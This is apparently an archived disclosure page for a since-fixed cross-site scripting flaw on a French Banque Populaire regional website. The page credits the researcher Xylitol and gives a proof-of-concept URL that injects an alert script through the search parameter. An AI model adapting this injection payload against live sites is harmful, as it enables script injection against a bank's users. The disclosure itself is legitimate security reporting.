www.bpbfc.banquepopulaire.fr cross-site-scripting (XSS) Vulnerability

Advertisements:

Security researcher Xylitol, has submitted on 27/01/2008 a cross-site-scripting (XSS) vulnerability affecting www.bpbfc.banquepopulaire.fr, which at the time of submission ranked 2666 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 30/01/2008. It is currently fixed.

Date submitted: 27/01/2008

Date published: 30/01/2008

Date fixed: 31/01/2008

Status:

FIXED

Author: Xylitol

Domain: www.bpbfc.banquepopulaire.fr

Category: XSS

Pagerank: 2666

URL: http://www.bpbfc.banquepopulaire.fr/rechercher.html?banque=bpbfc&titre=Bienvenue&mots=%3Cscript%3Eal
ert%28%27XSS%27%29%3C%2Fscript%3E&parse=%5Btype+Function%5D&swapPlace=%5Btype+Function%5D&loadImages
=%5Btype+Function%5D&createLoader=%5Btype+Function%5D&imageGen=%5Btype+Function%5D&randomNum=15&rand
omNumLast=15&container%5Fmc=%5Flevel0%2Econtainer&images%5Fxml=%3Cgallery+timer%3D%225%22+order%3D%2
2random%22+fadetime%3D%223%22+looping%3D%22yes%22+xpos%3D%22140%22+ypos%3D%220%22%3E%3Cimage+path%3D
%22img%2Frotation%2Fbandeau%5Frotation1%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5
Frotation2%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation3%2Ejpg%22+%2F%3E%3C
image+path%3D%22img%2Frotation%2Fbandeau%5Frotation4%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotatio
n%2Fbandeau%5Frotation5%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation6%2Ejpg
%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation7%2Ejpg%22+%2F%3E%3Cimage+path%3D%22
img%2Frotation%2Fbandeau%5Frotation8%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Fro
tation9%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation10%2Ejpg%22+%2F%3E%3Cim
age+path%3D%22img%2Frotation%2Fbandeau%5Frotation11%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation
%2Fbandeau%5Frotation12%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation13%2Ejp
g%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation14%2Ejpg%22+%2F%3E%3Cimage+path%3D%
22img%2Frotation%2Fbandeau%5Frotation15%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5
Frotation16%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation17%2Ejpg%22+%2F%3E%
3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation18%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frota
tion%2Fbandeau%5Frotation19%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation20%
2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation21%2Ejpg%22+%2F%3E%3Cimage+path
%3D%22img%2Frotation%2Fbandeau%5Frotation22%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbande
au%5Frotation23%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation24%2Ejpg%22+%2F
%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation25%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2F
rotation%2Fbandeau%5Frotation26%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotatio
n27%2Ejpg%22+%2F%3E%3Cimage+path%3D%22img%2Frotation%2Fbandeau%5Frotation28%2Ejpg%22+%2F%3E%3C%2Fgal
lery%3E&imageArray=%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Objec
t%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bob
ject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%
5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobje
ct+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D
%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject
+Object%5D%2C%5Bobject+Object%5D&imageData=%5Bobject+Object%5D&i=1&thisLoader=%5Flevel0%2Econtainer%
2Eloader2%5Fmc&alphaTween=%5BTween%5D&timerInterval=7

POST: French bank xssed !

Click here to view the mirror

XSS Attacks
Cross Site Scripting Exploits and Defense

Website Fraud Loss Prevention